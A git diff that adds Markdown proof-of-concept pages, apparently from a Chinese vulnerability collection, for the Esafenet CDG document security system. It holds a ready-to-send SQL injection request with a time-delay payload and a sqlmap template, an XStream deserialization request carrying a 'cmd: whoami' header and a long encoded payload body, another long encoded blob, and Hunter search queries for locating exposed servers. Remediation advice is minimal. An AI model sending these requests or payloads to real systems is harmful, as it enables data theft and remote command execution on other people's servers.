DFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706613728037-289b604a-77c3-4235-9670-4985c533780e.png](./img/_yjz0d-97miWet3n/1706613728037-289b604a-77c3-4235-9670-4985c533780e-606978.png)
+
+
+
+> 更新: 2024-04-20 22:01:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vvt7bcrmmulalp3n>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞.md
new file mode 100644
index 0000000..fd47e29
--- /dev/null
+++ b/亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞.md
@@ -0,0 +1,53 @@
+# 亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/nUy0RX7OgSGybkW4/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-800753.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Content-Length: 39
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+fileId=1';WAITFOR DELAY '0:0:5'--&pis=1
+```
+
+![1708236677491-71b76e2c-2bde-40b9-b677-5cad1b163cd6.png](./img/nUy0RX7OgSGybkW4/1708236677491-71b76e2c-2bde-40b9-b677-5cad1b163cd6-852730.png)
+
+sqlmap
+
+```plain
+POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Content-Length: 15
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+fileId=1&pis=1
+```
+
+![1708236708494-e4cac02c-8d40-418a-9fa7-37add9d9b0d8.png](./img/nUy0RX7OgSGybkW4/1708236708494-e4cac02c-8d40-418a-9fa7-37add9d9b0d8-483755.png)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ftiyy7n8ys975zao>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统SecureUsbConnection存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统SecureUsbConnection存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..c949b2a
--- /dev/null
+++ b/亿赛通电子文档安全管理系统SecureUsbConnection存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统SecureUsbConnection存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统SecureUsbConnection存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/UMEwMTQGUBCHmlTs/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-025259.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/SecureUsbConnection HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBD